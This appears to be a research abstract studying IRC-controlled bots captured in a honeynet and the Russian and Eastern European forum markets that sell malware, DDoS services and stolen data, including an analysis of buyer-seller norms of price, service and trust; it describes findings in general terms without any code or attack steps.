Examining the Creation, Distribution, and Function of Malware On-Line

The global adoption of the Internet and World Wide Web has engendered the growth of significant threats from computer criminals around the world. Computer crimes are costly, and many appear to be perpetrated by computer hackers in foreign countries, particularly Russia and Eastern Europe. These attackers often use malicious software, or malware, to automate attacks and enable multiple forms of cybercrime. Recently, a great deal of attention has been given to a new form of malware used by computer hackers called bots. This malware essentially takes over an infected computer, allowing it to receive commands remotely. Bots are also bought and sold in virtual markets operating out of Russia. Researchers have, however, only begun to explore the prevalence and origins of this form of malware and its potential as an attack tool. Thus, this study examined the social and technical aspects surrounding the creation, distribution, and use of bots through both a criminological and computer science examination of bots and malware.
Specifically, 13 bots were captured in the wild and analyzed using honeynet technologies to determine their utility and function in a simulated computing environment. The findings suggest that these bots had a significant impact on system functionality by changing system protocols, including adding and removing files. The bots also attempted to connect to command and control IRC servers around the world, though the majority appeared to reside in the United States. Five of the bots were able to connect to a command and control channel and received commands to scan other systems online, participate in Denial of Service Attacks, infect another system, and open communication sessions with other computers.
The creation and sale of bots and malware in the on-line black market were also examined using a sample of 909 threads collected from 10 publicly accessible web-forums in Eastern Europe and Russia. The findings suggest that a service economy has developed around the spread of bots, including distributed denial of service attack providers, spam distribution, and bulletproof web hosting. Malware is also available through these forums, such as trojan horse programs, encryption tools, and iframe malware uploading and downloading services. Credit card and identity documents were also readily available, along with hijacked ICQ numbers.
In order to better understand the social dynamics of this market, the normative orders of this community were explored using grounded theory methodology. The results suggest that three interrelated norms shape the relationships between buyers and sellers: price, customer service, and trust. Price is critical as the cost of goods affect the likelihood that an individual would be able to compete in the market. Customer service reflects the quality of products available, discounts for volume purchases, and real time support to their customers. Finally, trust refers to the lack of regulation within the markets, increasing the risk of engaging in a purchase with a vendor. Individuals who demonstrate that they were trustworthy could gain clients, while those who attempt to cheat other actors were publicly derided.
As a whole, this study demonstrates the key role that bots and other malicious software play in the facilitation of cybercrime across the globe. Bots have various utility in the wild, and receive commands from IRC channels around the globe. Though malicious software takes some skill to create, the forums examined demonstrate that bot masters generate a profit from their infrastructure by selling access to attack services that enables hackers of any skill to participate in attacks ranging from Distributed Denial of Service attacks to spam. Thus, there is a significant need to disrupt botnets and the markets that facilitate the distribution of malware and hack tools.